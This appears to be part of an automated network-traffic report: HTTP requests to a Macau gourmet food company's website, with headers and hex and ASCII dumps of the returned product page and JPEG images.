00 00 01 7e 02 02 00 04 00 00 00 01 00 00 19 04 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*7(12i ''Adobe Photoshop CS6 (Windows)2020:06:18 11:38:2302217nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:27:07.832191944 CET3429OUTGET /OurProducts.asp HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:08.106981993 CET3433INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:14 GMT
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Content-Length: 13694
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Expires: Mon, 13 Mar 2023 04:27:14 GMT
                                                                                                                                                              Cache-control: private
                                                                                                                                                              Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 47 6f 75 72 6d 65 74 20 48 6f 75 73 65 20 4d 61 63 61 75 20 4c 74 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6d 61 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 66 65 6e 79 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 3c 21 2d 2d 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 73 77 61 70 49 6d 67 52 65 73 74 6f 72 65 28 29 20 7b 20 2f 2f 76 33 2e 30 0d 0a 20 20 76 61 72 20 69 2c 78 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 4d 4d 5f 73 72 3b 20 66 6f 72 28 69 3d 30 3b 61 26 26 69 3c 61 2e 6c 65 6e 67 74 68 26 26 28 78 3d 61 5b 69 5d 29 26 26 78 2e 6f 53 72 63 3b 69 2b 2b 29 20 78 2e 73 72 63 3d 78 2e 6f 53 72 63 3b 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 70 72 65 6c 6f 61 64 49 6d 61 67 65 73 28 29 20 7b 20 2f 2f 76 33 2e 30 0d 0a 20 20 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 3b 20 69 66 28 64 2e 69 6d 61 67 65 73 29 7b 20 69 66 28 21 64 2e 4d 4d 5f 70 29 20 64 2e 4d 4d 5f 70 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 0d 0a 20 20 20 20 76 61 72 20 69 2c 6a 3d 64 2e 4d 4d 5f 70 2e 6c 65 6e 67 74 68 2c 61 3d 4d 4d 5f 70 72 65 6c 6f 61 64 49 6d 61 67 65 73 2e 61 72 67 75 6d 65 6e 74 73 3b 20 66 6f 72 28 69 3d 30 3b 20 69 3c 61 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0d 0a 20 20 20 20 69 66 20 28 61 5b 69 5d 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 21 3d 30 29 7b 20 64 2e 4d 4d 5f 70 5b 6a 5d 3d 6e 65 77 20 49 6d 61 67 65 3b 20 64 2e 4d 4d 5f 70 5b 6a 2b 2b 5d 2e 73 72 63 3d 61 5b 69 5d 3b 7d 7d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 66 69 6e 64 4f 62 6a 28 6e 2c 20 64 29 20 7b 20 2f 2f 76 34 2e 30 31 0d 0a 20 20 76 61 72 20 70 2c 69 2c 78 3b 20 20 69 66 28 21 64 29 20 64 3d 64 6f 63 75 6d 65 6e 74 3b 20 69 66 28 28 70 3d 6e 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 29 3e 30 26 26 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 2e 6c 65 6e 67 74 68 29 20 7b 0d 0a 20 20 20 20 64 3d 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 5b 6e 2e 73 75 62 73 74 72 69 6e 67 28 70 2b 31 29 5d 2e 64 6f 63 75 6d 65 6e 74 3b 20 6e 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 70 29 3b 7d 0d 0a 20 20 69 66 28 21 28 78 3d 64 5b 6e 5d 29 26 26 64 2e 61 6c 6c 29 20 78 3d 64 2e 61 6c 6c 5b
                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Gourmet House Macau Ltd</title><link href="main.css" rel="stylesheet" type="text/css" /><link href="fenye.css" rel="stylesheet" type="text/css" /><script type="text/JavaScript">...function MM_swapImgRestore() { //v3.0 var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}}function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);} if(!(x=d[n])&&d.all) x=d.all[
                                                                                                                                                              Mar 13, 2023 05:27:22.208442926 CET3448OUTGET /images/productMain_top.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.413264990 CET3452INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 812
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "567c65f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1b 00 c8 03 01 11 00 02 11 01 03 11 01 ff c4 00 6c 00 01 01 01 00 03 00 00 00 00 00 00 00 00 00 00 00 04 03 06 00 01 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 03 01 00 02 04 06 07 10 00 03 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 01 02 31 41 11 03 04 21 06 51 23 11 01 01 01 00 02 01 04 03 00 00 00 00 00 00 00 00 00 02 01 11 03 51 21 31 41 05 12 42 04 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f6 67 f4 9f a7 f5 fb 7d 7d fe 3f 27 75 74 78 3a 6d c7 f9 be 1f 6b 9f 8e a9 af bc 7f 11 f9 97 de fd f7 6f f4 76 d7 57 5d 7e 3d 79 bc 7a 7e dc 7c ee f8 f1 8f 0f 6f 76 ee f1 9e cc 9c b6 df 2d f2 de 59 f3 79 bc 80 88 16 54 a8 d0 d2 a5 c0 d2 a5 c6 87 95 c2 fa c7 97 46 40 f2 a6 46 86 95 2a 07 95 26 74 2c a9 08 5c 55 4e d9 3a c9 c6 b0 f5 96 1e a0 d7 86 0d 30 b6 0d 39 0e c1 a4 13 b3 60 52 07 67 9e 93 44 b0 69 04 bd 81 4e 45 b0 69 07 a6 d3 e5 3e 1a c3 0f 77 86 6b 3f 37 fa 7f 5f 8b d7 d1 e3 f5 f7 57 7f 83 be 94 7f a3 e5 f5 3a 7c 2a 96 fe f1 fd 47 d1 fd 17 df 76 ff 00 3f 6c f5 76 57 e5 d7 bb c7 af eb cf ce 6f 8f 38 6e ae ed cd e3 7d 98 b4 db 7c bf ad e5 9f 2f cf 20 5a 44 c6 26 05 95 2a 34 34 a9 70 34 a9 71 a1 e5 70 be b1 e5 d1 90 3c a9 91 a1 a5 4a 81 e5 49 9d 0b 2a 42 17 15 53 b6 4e b2 71 ac 3d 65 87 a8 35 e1 83 4c 2d 83 4e 43 b0 69 04 ec d8 14 81 d9 e7 a4 d1 2c 1a 41 2f 60 53 91 6c 1a 41 ac 2d 44 5f c6 9a ca 38 67 53 94 4c 65 a4 4c 62 60 59 52 a3 43 4a 97 03 4a 97 1a 1e 57 0b eb 1e 5d 19 03 ca 99 1a 1a 54 a8 1e 54 99 d0 b2 a4 21 71 55 3b 64 eb 27 1a c3 d6 58 7a 83 5e 18 34 c2 d8 34 e4 3b 06 90 4e cd 81 48 1d 9e 7a 4d 12 c1 a4 12 f6 05 39 16 c1 a4 1a c2 d4 42 b2 1e b3 93 94 6c 65 a4 4c 62 60 59 52 a3 43 4a 97 03 4a 97 1a 1e 57 0b eb 1e 5d 19 03 ca 99 1a 1a 54 a8 1e 54 99 d0 b2 a4 21 71 55 3b 64 eb 27 1a c3 d6 58 7a 83 5e 18 34 c2 d8 34 e4 3b 06 90 4e cd 81 48 1d 9e 7a 4d 12 c1 a4 12 f6 05 39 16 c1 a4 1a c2 d4 42 b2 1e b3 ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedl1A!Q#Q!1AB?g}}?'utx:mkovW]~=yz~|ov-YyTF@F*&t,\UN:09`RgDiNEi>wk?7_W:|*Gv?lvWo8n}|/ ZD&*44p4qp<JI*BSNq=e5L-NCi,A/`SlA-D_8gSLeLb`YRCJJW]TT!qU;d'Xz^44;NHzM9BleLb`YRCJJW]TT!qU;d'Xz^44;NHzM9B
                                                                                                                                                              Mar 13, 2023 05:27:22.415127039 CET3453OUTGET /uploadfiles/SRL_8_1_3753286.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.626168966 CET3481INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 225579
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "62e2f13aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:28 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 30 71 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 31 31 3a 30 36 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 d3 2c 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 0qExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:11:06"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(,HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H
                                                                                                                                                              Mar 13, 2023 05:27:30.734898090 CET4560OUTGET /uploadfiles/SRL_3_1_3752094.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:30.946501017 CET4591INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 179772
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "7681d03aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:36 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 2a 47 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 31 30 3a 31 35 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 a9 26 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: *GExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:10:15"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(&HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H
                                                                                                                                                              Mar 13, 2023 05:27:43.780404091 CET5645OUTGET /SysImages/Next.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
